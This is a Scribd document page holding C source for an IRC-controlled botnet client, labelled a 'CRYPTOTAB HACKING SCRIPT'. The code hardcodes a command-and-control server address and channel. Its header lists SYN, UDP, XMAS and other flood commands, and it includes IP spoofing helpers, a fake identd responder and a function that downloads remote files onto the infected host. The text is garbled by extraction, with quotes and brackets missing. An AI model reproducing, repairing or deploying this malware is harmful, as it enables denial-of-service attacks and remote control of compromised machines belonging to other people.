0% found this document useful (0 votes)
203 views2 pages

Crytab

This document contains code for a hacking script. It includes functions for spoofing IP addresses, launching denial of service attacks, and downloading files over HTTP. The script connects to a remote server to receive commands.

Uploaded by

Banna Ji
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
203 views2 pages

Crytab

This document contains code for a hacking script. It includes functions for spoofing IP addresses, launching denial of service attacks, and downloading files over HTTP. The script connects to a remote server to receive commands.

Uploaded by

Banna Ji
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

/* CRYPTOTAB HACKING SCRIPT !* udp <target> <port> <time> !

* syn <target> <port>


<time> !* fin <target> <port> <time> !* psh <target> <port> <time> !* ack <target>
<port> <time> !* urg <target> <port> <time> !* rst <target> <port> <time> !* ece
<target> <port> <time> !* cwr <target> <port> <time> !* sew <target> <port>
<time> !* xmas <target> <port> <time> !* unknown <target> <time>*/#undef
STARTUP#undef IDENT#define FAKENAME Routers #define CHAN ##Legendary #define KEY
int numservers=1;char *servers[] = { 185.62.190.7 , (void*)0};#include
<stdarg.h>#include <errno.h>#include <stdio.h>#include <stdlib.h>#include
<string.h>#include <sys/types.h>#include <sys/stat.h>#include <fcntl.h>#include
<strings.h>#include <netinet/in.h>#include <unistd.h>#include <sys/time.h>#include
<sys/socket.h>#include <signal.h>#include <arpa/inet.h>#include <netdb.h>#include
<time.h>#include <sys/wait.h>#include <sys/ioctl.h>int sock,changeservers=0; char
*server, *chan, *key, *nick, *ident, *user, disabled=0, execfile[256],dispass[256];
unsigned int *pids; unsigned long spoofs=0, spoofsm=0, numpids=0;int
strwildmatch(const char* pattern, const char* string) { switch(*pattern) { case
'\0': return *string; case '*': return !(!strwildmatch(pattern+1, string) ||
*string && !strwildmatch(pattern, string+1)); case '?': return !(*string && !
strwildmatch(pattern+1, string+1)); default: return !((toupper(*pattern) ==
toupper(*string)) && !strwildmatch(pattern+1, string+1)); } }int Send(int sock,
char *words, ...) { static char textBuffer[1024]; va_list args; va_start(args,
words); vsprintf(textBuffer, words, args); va_end(args); return
write(sock,textBuffer,strlen(textBuffer));}int mfork(char *sender) { unsigned int
parent, *newpids, i; if (disabled == 1) { Send(sock, NOTICE %s :Unable to comply.\n
,sender); return 1; } parent=fork(); if (parent <= 0) return parent; numpids++;
newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int)); for
(i=0;i<numpids-1;i++) newpids[i]=pids[i]; newpids[numpids-1]=parent; free(pids);
pids=newpids; return parent;}unsigned long getspoof() { if (!spoofs) return rand();
if (spoofsm == 1) return ntohl(spoofs); return ntohl(spoofs+(rand() % spoofsm)
+1);}void filter(char *a) { while(a[strlen(a)-1] == '\r' || a[strlen(a)-1] == '\n')
a[strlen(a)-1]=0; }char *makestring() { char *tmp; int len=13,i;
tmp=(char*)malloc(len+1); memset(tmp,0,len+1); for (i=0;i<len;i++) tmp[i]=(rand()
%(91-65))+65; tmp[0]='K'; tmp[1]='R'; tmp[2]='E'; tmp[3]='D'; tmp[4]='|'; return
tmp;}void identd() { int sockname,sockfd,sin_size,tmpsock,i; struct sockaddr_in
my_addr,their_addr; char szBuffer[1024]; if ((sockfd = socket(AF_INET, SOCK_STREAM,
0)) == -1) return; my_addr.sin_family = AF_INET; my_addr.sin_port = htons(113);
my_addr.sin_addr.s_addr = INADDR_ANY; memset(&(my_addr.sin_zero), 0, 8); if
(bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) return;
if (listen(sockfd, 1) == -1) return; if (fork() == 0) return; sin_size =
sizeof(struct sockaddr_in); if ((tmpsock = accept(sockfd, (struct sockaddr
*)&their_addr, &sin_size)) == -1) exit(0); for(;;) { fd_set bla; struct timeval
timee; FD_ZERO(&bla); FD_SET(tmpsock,&bla); timee.tv_sec=timee.tv_usec=60; if
(select(tmpsock + 1,&bla,(fd_set*)0,(fd_set*)0,&timee) < 0) exit(0); if
(FD_ISSET(tmpsock,&bla)) break; } i = recv(tmpsock,szBuffer,1024,0); if (i <= 0 ||
i >= 20) exit(0); szBuffer[i]=0; if (szBuffer[i-1] == '\n' || szBuffer[i-1] ==
'\r') szBuffer[i-1]=0; if (szBuffer[i-2] == '\n' || szBuffer[i-2] == '\r')
szBuffer[i-2]=0; Send(tmpsock, %s : USERID : UNIX : %s\n ,szBuffer,ident);
close(tmpsock); close(sockfd); exit(0);}long pow(long a, long b) { if (b == 0)
return 1; if (b == 1) return a; return a*pow(a,b-1);}u_short in_cksum(u_short
*addr, int len) { register int nleft = len; register u_short *w = addr; register
int sum = 0; u_short answer =0; while (nleft > 1) { sum += *w++; nleft -= 2; } if
(nleft == 1) { *(u_char *)(&answer) = *(u_char *)w; sum += answer; } sum = (sum >>
16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer);}void
get(int sock, char *sender, int argc, char **argv) { int sock2,i,d; struct
sockaddr_in server; unsigned long ipaddr; char buf[1024]; FILE *file; unsigned char
bufm[4096]; if (mfork(sender) != 0) return; if (argc < 2) { Send(sock, NOTICE %s
:GET <host> <save as>\n ,sender); exit(0); } if ((sock2 = socket(AF_INET,
SOCK_STREAM, 0)) == -1) { Send(sock, NOTICE %s :Unable to create socket.\n
,sender); exit(0); } if (!strncmp(argv[1], http:// ,7)) strcpy(buf,argv[1]+7);
else strcpy(buf,argv[1 for (i=0;i<strlen(buf) && buf[i] != '/';i++); buf[i]=0;
server.sin_family = AF_INET; server.sin_port = htons(80); if ((ipaddr =
inet_addr(buf)) == -1) { struct hostent *hostm; if ((hostm=gethostbyname(buf)) ==
NULL) { Send(sock, NOTICE %s :Unable to resolve address.\n ,sender); exit(0); }
memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length); } else
server.sin_addr.s_addr = ipaddr; memset(&(server.sin_zero), 0, 8); if
(connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) { Send(sock,
NOTICE %s :Unable to connect to http.\n ,sender); exit(0); } Send(sock2, GET /%s
HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux
2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language:
en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n ,buf+i+1,buf); Send(sock, NOTICE
%s :Receiving file.\n ,sender); file=fopen(argv[2], wb ); while(1) { int i; if
((i=recv(sock2,bufm,4096,0)) <= 0) break; if (i < 4096) bufm[i]=0; for (d=0;d<i;d+
+) if (!strncmp(bufm+d, \r\n\r\n ,4)) { for (d+=4;d<i;d++) fputc(bufm[d],file);
goto done; } } done: Send(sock, NOTICE %s :Saved as %s\n ,sender,argv[2 while(1)
{ int i,d; if ((i=recv(sock2,bufm,4096,0)) <= 0) break; if (i < 4096) bufm[i]=0;
for (d=0;d<i;d++) fputc(bufm[d],file); } fclose(file); close(sock2); exit(0);}void
getspoofs(int sock, char *sender, int argc, char **argv) { unsigned long
a=spoofs,b=spoofs+(spoofsm-1); if (spoofsm == 1) Send(sock, NOTICE %s :Spoofs: %d.
%d.%d.%d\n ,sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)
[0 else Send(sock, NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n ,sender,
((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0],((u_char*)&b)
[3],((u_char*)&b)[2],((u_char*)&b)[1],((u_char*)&b)[0

You might also like